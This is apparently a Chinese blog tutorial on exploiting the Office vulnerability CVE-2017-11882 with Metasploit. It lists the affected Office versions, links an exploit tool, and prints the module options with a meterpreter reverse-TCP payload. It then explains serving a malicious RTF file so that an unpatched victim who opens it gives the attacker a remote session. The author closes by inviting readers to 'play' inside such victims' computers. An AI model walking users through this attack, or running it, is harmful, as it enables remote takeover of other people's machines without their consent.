CVE-2017-11882 利用

這個漏洞出來很久了,據說通殺以下版本的Office:

MicrosoftOffice 2000

MicrosoftOffice 2003

MicrosoftOffice 2007 Service Pack 3

MicrosoftOffice 2010 Service Pack 2

MicrosoftOffice 2013 Service Pack 1

MicrosoftOffice 2016

MicrosoftOffice 365

注意是沒有更新過的Office。

屁話不多說了。因爲我比較喜歡使用Metasploit框架,大家不喜歡的話可以到這個地址:https://github.com/Ridter/CVE-2017-11882.git下載工具。

首先,啓動Metasploit並連接數據庫(沒有自動連接的請手動操作)。

然後加載這個模塊,如圖:

使用show options看看有什麼要設置的。

msf exploit(windows/fileformat/office_ms17_11882) > show options 

Module options (exploit/windows/fileformat/office_ms17_11882):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILENAME     msf.rtf          yes       Filename to save as, or inject
   FOLDER_PATH                   no        Path to file to inject
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080             yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office


msf exploit(windows/fileformat/office_ms17_11882) > 
其中,Required選項爲Yes的必須要填。有一些設置是默認的。

然後開始設置,並啓動服務。


接着,我們在物理機上訪問一下這個地址。

注意,我們啓用了SSL,因此Chrome會彈出不安全提示。


只需要點高級,繼續訪問即可。


如圖,就會下載這個文件。

如果Office沒有打補丁,你就會發現返回了一個meterpreter回話,但是不幸的是,Win10給我自動更新裝上了這個補丁,於是我看到的是這樣的。


這也就意味着滲透失敗了。但是如果對方是一個將Windows自動更新關閉且沒有在安全軟件的監護下安裝漏洞補丁的人,你就可以使用meterpreter愉快的在他的電腦裏玩耍了。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章